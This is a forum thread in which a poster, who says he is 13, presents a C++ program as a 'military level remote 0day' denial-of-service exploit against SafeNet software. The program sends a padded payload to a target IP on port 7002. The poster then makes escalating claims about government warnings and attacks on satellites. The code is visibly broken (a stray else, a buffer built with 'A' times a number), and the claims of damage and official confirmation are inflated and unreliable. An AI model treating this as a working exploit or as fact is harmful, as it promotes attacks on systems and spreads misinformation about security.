- Forum
- Windows Programming
- [0day]Military Level Remote 0day for Ana
[0day]Military Level Remote 0day for Analyse[CODE]
closed account (ozUkoG1T)
Hi,
I today have discovered a Remote Exploit Present on SafeNet which is also a provider of Security for Multiple Governments & Space Satellites of USA and other multiple Countries.
This types of Exploits are one of the most deadly even considered a Cyberwar Level Breach (Highest Level Breach). This Exploit has been reported to Governments around the Globe till now but many of the Homes and some Governments are STILL fixing it but homes and such have still not had this fixed but I made sure this 0day will not allow a breach of security but still a threat towards them.
What is a 0day?
A 0day attack or exploit is a type of security vulnerability which the product developers are not aware but a Attacker IS. This is what make a 0day Deadly since the Attacker can breach 1000's of machines before the Developers are finally found the vulnerability & patched it.
A single 0Day can be sold on the Black Market for around $100,000 & most succesful Malwares use these.
Using this during Cyber Attacks will cause a Denial Of Service Conditions on target.So it could or will almost render computer useless.
This Exploit is just for show and to analyze how Remote Exploits work. Please Do not use these on Government websites or Military bases since most are aware of this and some even fixed it also last time I did these on a Government for POC I got a warning even though I told them that this could disturb many of the Cyber Operations on their soil. So I highly advice against using this. I am not responsible for any actions you do using this or similar type codes. Well , also some of us posted this exploit in 2012 and also I have changed some things in this code such as shutdown() so that the denial of service will last longer & more powerful.
I have reported this to some governments.
This should be helpful to all network programmers. I hope you learn something new from this.
Kind Regards,
I today have discovered a Remote Exploit Present on SafeNet which is also a provider of Security for Multiple Governments & Space Satellites of USA and other multiple Countries.
This types of Exploits are one of the most deadly even considered a Cyberwar Level Breach (Highest Level Breach). This Exploit has been reported to Governments around the Globe till now but many of the Homes and some Governments are STILL fixing it but homes and such have still not had this fixed but I made sure this 0day will not allow a breach of security but still a threat towards them.
What is a 0day?
A 0day attack or exploit is a type of security vulnerability which the product developers are not aware but a Attacker IS. This is what make a 0day Deadly since the Attacker can breach 1000's of machines before the Developers are finally found the vulnerability & patched it.
A single 0Day can be sold on the Black Market for around $100,000 & most succesful Malwares use these.
Using this during Cyber Attacks will cause a Denial Of Service Conditions on target.So it could or will almost render computer useless.
|
|
This Exploit is just for show and to analyze how Remote Exploits work. Please Do not use these on Government websites or Military bases since most are aware of this and some even fixed it also last time I did these on a Government for POC I got a warning even though I told them that this could disturb many of the Cyber Operations on their soil. So I highly advice against using this. I am not responsible for any actions you do using this or similar type codes. Well , also some of us posted this exploit in 2012 and also I have changed some things in this code such as shutdown() so that the denial of service will last longer & more powerful.
I have reported this to some governments.
This should be helpful to all network programmers. I hope you learn something new from this.
Kind Regards,
Last edited on
#include <windows.h>
#include <iostream>
using namespace std;
#pragma comment(lib,"ws2_32.lib");
int SafeSend(SOCKET s, char* buf, int buflen)
{
int sendlen = 0;
int totalsend = 0;
int remaining = buflen;
while(sendlen != buflen)
{
sendlen = send(s, &buf[totalsend], remaining, 0);
if(sendlen == SOCKET_ERROR)
{
return SOCKET_ERROR;
}
totalsend = totalsend + sendlen;
remaining = sendlen - totalsend;
}
_asm mov eax ,0 //Love ASM due to epic syntax
}
int main()
{
WSADATA w;
WSAStartup(MAKEWORD(2,2),&w);
SOCKADDR_IN addr;
SOCKET cSock = socket(AF_INET , SOCK_STREAM,0);
addr.sin_addr.s_addr = inet_addr(TARGET_IP);
addr.sin_family = AF_INET;
addr.sin_port = htons(7002);
if(connect(cSock,(SOCKADDR*)&addr,sizeof(addr)) == SOCKET_ERROR)
{
WSACleanup();
cout<<"[-] Could Not Connect to Target:Failure During Attack Firewall is Blocking it\n";
cin.get();
return 0;
}
string Payload;
Payload = "#1";
Payload += 'A' *0x4093; //Payload is successfully added to this 0day Exploit
else
{
SafeSend(cSock , Payload.c_str() ,strlen(Payload.c_str()));
shutdown(cSock,2); //End Connection
WSACleanup();
cout<<"[-] Operation Darkmoon is Succesfull the 0day Exploit is sent towards Target\n";
cin.get();
}
return 0;
}
I am having trouble with _asm mov eax ,0 //Love ASM due to epic syntax , why is it ??
#include <iostream>
using namespace std;
#pragma comment(lib,"ws2_32.lib");
int SafeSend(SOCKET s, char* buf, int buflen)
{
int sendlen = 0;
int totalsend = 0;
int remaining = buflen;
while(sendlen != buflen)
{
sendlen = send(s, &buf[totalsend], remaining, 0);
if(sendlen == SOCKET_ERROR)
{
return SOCKET_ERROR;
}
totalsend = totalsend + sendlen;
remaining = sendlen - totalsend;
}
_asm mov eax ,0 //Love ASM due to epic syntax
}
int main()
{
WSADATA w;
WSAStartup(MAKEWORD(2,2),&w);
SOCKADDR_IN addr;
SOCKET cSock = socket(AF_INET , SOCK_STREAM,0);
addr.sin_addr.s_addr = inet_addr(TARGET_IP);
addr.sin_family = AF_INET;
addr.sin_port = htons(7002);
if(connect(cSock,(SOCKADDR*)&addr,sizeof(addr)) == SOCKET_ERROR)
{
WSACleanup();
cout<<"[-] Could Not Connect to Target:Failure During Attack Firewall is Blocking it\n";
cin.get();
return 0;
}
string Payload;
Payload = "#1";
Payload += 'A' *0x4093; //Payload is successfully added to this 0day Exploit
else
{
SafeSend(cSock , Payload.c_str() ,strlen(Payload.c_str()));
shutdown(cSock,2); //End Connection
WSACleanup();
cout<<"[-] Operation Darkmoon is Succesfull the 0day Exploit is sent towards Target\n";
cin.get();
}
return 0;
}
I am having trouble with _asm mov eax ,0 //Love ASM due to epic syntax , why is it ??
closed account (ozUkoG1T)
okay , well _asm mov eax , 0 is a way of return 0 in a opcode so just replace that with return 0; I use _asm mov eax since inline assembly is preffered in since it make my computer not lag as much but again the difference is not noticeable so it is alright to replace it with return 0;
This exploit was previously programmed in assembly then to post it since not many people understand assembly I changed it to C++.
NEWS:
Also some Government (Not saying due to I got a Mail from them about this) has successfully made sure they are not vulnerable to this attack. HINT: Not a big country.
This attack is confirmed as a severe Attack Vector by many of the Cyber units in government agencies.
Now I found a new damage output when this attack is conducted.
1. The target if SafeNet is open as a Application the SafeNet will make the target computer suffer quite a few File Corruptions.
2. Computer will completly freeze if SafeNet is running on Windows 8 x64.
3. When target is attacked multiple times this will unleash a complete Freeze and a Hours worth of Denial Of Service Conditions and if attacked continually it will never recover until reboot. In which case all unsaved data is gone. So attacking any Military Operation is not a good idea since I almost got in a mess with them.
Space Satellites IP address are secrets but some Governments said such attack where attacker found IP of Satellites and attacked it , could devastate the Satellites and doing so is probably going to get Majors in around 10 - 15 years imprisonment. Lucky I am a minor - 13 years - so I wont get as much but still a bad thing.
PLEASE DO NOT USE THIS ATTACK IN A MALICIOUS WAY IT IS ONLY FOR ANALYSE.
This exploit was previously programmed in assembly then to post it since not many people understand assembly I changed it to C++.
NEWS:
Also some Government (Not saying due to I got a Mail from them about this) has successfully made sure they are not vulnerable to this attack. HINT: Not a big country.
This attack is confirmed as a severe Attack Vector by many of the Cyber units in government agencies.
Now I found a new damage output when this attack is conducted.
1. The target if SafeNet is open as a Application the SafeNet will make the target computer suffer quite a few File Corruptions.
2. Computer will completly freeze if SafeNet is running on Windows 8 x64.
3. When target is attacked multiple times this will unleash a complete Freeze and a Hours worth of Denial Of Service Conditions and if attacked continually it will never recover until reboot. In which case all unsaved data is gone. So attacking any Military Operation is not a good idea since I almost got in a mess with them.
Space Satellites IP address are secrets but some Governments said such attack where attacker found IP of Satellites and attacked it , could devastate the Satellites and doing so is probably going to get Majors in around 10 - 15 years imprisonment. Lucky I am a minor - 13 years - so I wont get as much but still a bad thing.
PLEASE DO NOT USE THIS ATTACK IN A MALICIOUS WAY IT IS ONLY FOR ANALYSE.
Topic archived. No new replies allowed.